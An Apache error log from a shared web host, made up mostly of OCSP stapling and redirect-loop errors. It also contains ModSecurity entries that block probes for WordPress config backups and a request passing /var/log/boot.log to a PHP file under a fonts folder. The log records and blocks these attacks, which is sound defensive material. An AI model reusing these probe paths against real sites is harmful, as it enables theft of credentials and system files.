[Mon May 11 21:01:57.936714 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/wp-config.php.backup"] [unique_id "agInpfjVc-A-CSptvm1z4wAAAEY"]
[Mon May 11 21:01:57.936860 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/wp-config.php.backup"] [unique_id "agInpfjVc-A-CSptvm1z4wAAAEY"]
[Mon May 11 21:01:59.370999 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agInpfjVc-A-CSptvm1z4wAAAEY"]
[Mon May 11 21:02:00.747544 2026] [ssl:error] [pid 1516058:tid 1516097] (EAI 2)Name or service not known: [client 45.149.29.206:46771] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:02:00.747582 2026] [ssl:error] [pid 1516058:tid 1516097] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:07.989516 2026] [ssl:error] [pid 1501831:tid 1501843] (EAI 2)Name or service not known: [client 46.101.212.5:55850] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:02:07.989557 2026] [ssl:error] [pid 1501831:tid 1501843] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:09.378677 2026] [ssl:error] [pid 1501883:tid 1501909] (EAI 2)Name or service not known: [client 58.97.239.223:40177] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:02:09.378713 2026] [ssl:error] [pid 1501883:tid 1501909] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:10.065856 2026] [ssl:error] [pid 1501831:tid 1501851] (EAI 2)Name or service not known: [client 92.112.16.111:38835] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:02:10.065883 2026] [ssl:error] [pid 1501831:tid 1501851] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:10.429632 2026] [ssl:error] [pid 1511173:tid 1511200] (EAI 2)Name or service not known: [client 216.157.42.68:60095] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:10.432784 2026] [ssl:error] [pid 1511173:tid 1511200] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:11.221001 2026] [ssl:error] [pid 1511173:tid 1511179] (EAI 2)Name or service not known: [client 216.157.42.74:60835] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:11.221049 2026] [ssl:error] [pid 1511173:tid 1511179] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:11.259597 2026] [ssl:error] [pid 1502013:tid 1502042] (EAI 2)Name or service not known: [client 38.183.44.134:39080] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:02:11.259640 2026] [ssl:error] [pid 1502013:tid 1502042] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:12.864204 2026] [ssl:error] [pid 1511173:tid 1511197] (EAI 2)Name or service not known: [client 216.157.42.75:25958] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:12.864244 2026] [ssl:error] [pid 1511173:tid 1511197] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:13.376452 2026] [ssl:error] [pid 1501883:tid 1501908] (EAI 2)Name or service not known: [client 216.157.42.95:56447] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:13.376507 2026] [ssl:error] [pid 1501883:tid 1501908] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:15.242306 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:15525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:15.242628 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:15525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:15.754205 2026] [core:error] [pid 1501831:tid 1501853] [client 4.193.137.131:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:15.754241 2026] [core:error] [pid 1501831:tid 1501853] [client 4.193.137.131:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:16.241647 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:15535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:16.241697 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:15535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:16.751401 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:15514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:16.751447 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:15514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:17.243352 2026] [core:error] [pid 1516058:tid 1516099] [client 4.193.137.131:15516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:17.243391 2026] [core:error] [pid 1516058:tid 1516099] [client 4.193.137.131:15516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:17.724558 2026] [core:error] [pid 1511173:tid 1511185] [client 4.193.137.131:15498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:17.724590 2026] [core:error] [pid 1511173:tid 1511185] [client 4.193.137.131:15498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:18.223178 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:26786] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:18.223207 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:26786] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:18.686421 2026] [security2:error] [pid 1501883:tid 1501905] [client 216.73.216.110:15931] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20250830"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agInujP5Q_-MBliRCAxqJQAAABQ"]
[Mon May 11 21:02:18.687038 2026] [security2:error] [pid 1501883:tid 1501905] [client 216.73.216.110:15931] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agInujP5Q_-MBliRCAxqJQAAABQ"]
[Mon May 11 21:02:18.724461 2026] [core:error] [pid 1511173:tid 1511199] [client 4.193.137.131:15511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:18.724495 2026] [core:error] [pid 1511173:tid 1511199] [client 4.193.137.131:15511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:18.744891 2026] [security2:error] [pid 1501883:tid 1501905] [client 216.73.216.110:15931] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agInujP5Q_-MBliRCAxqJQAAABQ"]
[Mon May 11 21:02:19.240516 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:15493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:19.240553 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:15493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:19.709494 2026] [core:error] [pid 1501883:tid 1501901] [client 44.234.85.235:45306] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:19.709548 2026] [core:error] [pid 1501883:tid 1501901] [client 44.234.85.235:45306] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:19.724268 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:15523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:19.724313 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:15523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:20.213939 2026] [core:error] [pid 1502013:tid 1502040] [client 4.193.137.131:15513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:20.213973 2026] [core:error] [pid 1502013:tid 1502040] [client 4.193.137.131:15513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:20.719255 2026] [core:error] [pid 1501883:tid 1501902] [client 4.193.137.131:15539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:20.719296 2026] [core:error] [pid 1501883:tid 1501902] [client 4.193.137.131:15539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:21.214088 2026] [core:error] [pid 1516058:tid 1516097] [client 4.193.137.131:15515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:21.214127 2026] [core:error] [pid 1516058:tid 1516097] [client 4.193.137.131:15515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:21.692024 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:15531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:21.692055 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:15531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:22.171712 2026] [core:error] [pid 1501883:tid 1501904] [client 4.193.137.131:15497] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:22.171744 2026] [core:error] [pid 1501883:tid 1501904] [client 4.193.137.131:15497] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:22.339881 2026] [ssl:error] [pid 1511173:tid 1511178] (EAI 2)Name or service not known: [client 216.157.40.65:7920] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:22.339909 2026] [ssl:error] [pid 1511173:tid 1511178] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:22.704794 2026] [core:error] [pid 1502013:tid 1502049] [client 4.193.137.131:15532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:22.704875 2026] [core:error] [pid 1502013:tid 1502049] [client 4.193.137.131:15532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:23.214846 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:26756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:23.214873 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:26756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:23.594362 2026] [ssl:error] [pid 1501883:tid 1501895] (EAI 2)Name or service not known: [client 216.157.40.69:3317] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:23.594397 2026] [ssl:error] [pid 1501883:tid 1501895] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:23.707550 2026] [core:error] [pid 1516058:tid 1516110] [client 4.193.137.131:15540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:23.707576 2026] [core:error] [pid 1516058:tid 1516110] [client 4.193.137.131:15540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:24.183432 2026] [core:error] [pid 1511173:tid 1511187] [client 4.193.137.131:15500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:24.183466 2026] [core:error] [pid 1511173:tid 1511187] [client 4.193.137.131:15500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:24.576814 2026] [ssl:error] [pid 1516058:tid 1516091] (EAI 2)Name or service not known: [client 216.157.40.65:34117] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:24.576849 2026] [ssl:error] [pid 1516058:tid 1516091] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:24.707147 2026] [core:error] [pid 1501831:tid 1501833] [client 4.193.137.131:15508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:24.707269 2026] [core:error] [pid 1501831:tid 1501833] [client 4.193.137.131:15508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:24.894261 2026] [ssl:error] [pid 1534836:tid 1534893] (EAI 2)Name or service not known: [client 216.157.40.71:50287] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:02:24.894475 2026] [ssl:error] [pid 1534836:tid 1534893] AH01941: stapling_renew_response: responder error
[Mon May 11 21:02:25.192308 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:15509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:25.192342 2026] [core:error] [pid 1511173:tid 1511196] [client 4.193.137.131:15509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:25.712405 2026] [core:error] [pid 1534836:tid 1534885] [client 4.193.137.131:15498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:25.712430 2026] [core:error] [pid 1534836:tid 1534885] [client 4.193.137.131:15498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:26.188495 2026] [core:error] [pid 1534836:tid 1534890] [client 4.193.137.131:15538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:26.188635 2026] [core:error] [pid 1534836:tid 1534890] [client 4.193.137.131:15538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:26.844355 2026] [core:error] [pid 1501831:tid 1501848] [client 4.193.137.131:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:26.844387 2026] [core:error] [pid 1501831:tid 1501848] [client 4.193.137.131:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:27.338560 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:27.338584 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:27.838796 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:15519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:27.838828 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:15519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:28.337928 2026] [core:error] [pid 1501883:tid 1501897] [client 4.193.137.131:15515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:28.337965 2026] [core:error] [pid 1501883:tid 1501897] [client 4.193.137.131:15515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:28.861053 2026] [core:error] [pid 1502013:tid 1502036] [client 4.193.137.131:15539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:28.861084 2026] [core:error] [pid 1502013:tid 1502036] [client 4.193.137.131:15539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:29.365577 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:15551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:29.365614 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:15551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:30.005697 2026] [core:error] [pid 1501831:tid 1501854] [client 4.193.137.131:26755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:30.005735 2026] [core:error] [pid 1501831:tid 1501854] [client 4.193.137.131:26755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:30.729602 2026] [core:error] [pid 1511173:tid 1511199] [client 4.193.137.131:15542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:30.729640 2026] [core:error] [pid 1511173:tid 1511199] [client 4.193.137.131:15542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:31.209106 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:15503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:31.209137 2026] [core:error] [pid 1534836:tid 1534879] [client 4.193.137.131:15503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:31.684474 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:15521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:31.684508 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:15521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:32.168307 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:26761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:32.168343 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:26761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:32.783124 2026] [core:error] [pid 1501831:tid 1501855] [client 4.193.137.131:15517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:32.783356 2026] [core:error] [pid 1501831:tid 1501855] [client 4.193.137.131:15517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:33.292032 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/backup.wp-config.php"] [unique_id "agInyfjVc-A-CSptvm10MAAAAEY"]
[Mon May 11 21:02:33.292204 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/backup.wp-config.php"] [unique_id "agInyfjVc-A-CSptvm10MAAAAEY"]
[Mon May 11 21:02:33.293407 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:15496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:33.293430 2026] [core:error] [pid 1534836:tid 1534875] [client 4.193.137.131:15496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
